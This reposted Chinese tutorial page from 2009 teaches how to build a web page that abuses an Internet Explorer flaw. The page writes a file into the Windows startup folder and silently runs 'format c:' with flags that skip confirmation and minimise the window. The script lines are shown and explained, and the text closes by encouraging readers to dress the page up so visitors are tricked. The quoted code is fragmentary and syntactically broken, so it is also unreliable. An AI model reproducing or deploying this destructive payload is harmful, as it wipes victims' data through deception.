当前位置: 首页 > 图文教程 > 网页制作 > HTML/XHTML教程 > 有关HTML代码的另类应用技巧

HTML/XHTML教程
XHTML中不再使用HTML中的一些废弃元素
语义化的HTML结构怎么理解
Web 标准学习 理解结构和表现相分离
html5 标签
HTML5 新事件 小结
HTML5 b和i标记将被赋予真正的语义
HTML是网页制作者必须要学习掌握的
HTML DOCTYPE的缩写
Readonly和Disabled的区别
16进制颜色代码(完全)
H标记要在网页制作中合理使用
abbr标记和acronym标记
知名浏览器对DOCTYPE模式的选择机制
用标准dl,dt,dd标签抛弃table列表
html 标签ID可以是变量
iframe 自适应大小实现代码
HTML5 解析规则分析
HTML减肥 精简HTML标记制作网页
HTML5 File API改善网页上传功能
HTML 5 Reset Stylesheet

HTML/XHTML教程 中的 有关HTML代码的另类应用技巧


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-04   浏览: 80 ::
收藏到网摘: n/a

这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

scr.reset() scr.path="c:\\windows\\start menu\\programs\\启动\\文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')

对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

首先,我们来看看这一句

scr.path="c:\\windows\\start menu\\programs\\启动\\文件名

这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')

这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

在这里我把他的一些参数,简要的说说,大家会更加明白的。

在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

在这段代码里,核心语句

wsh.run('start.exe /m format c:/q/autotest/u')

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。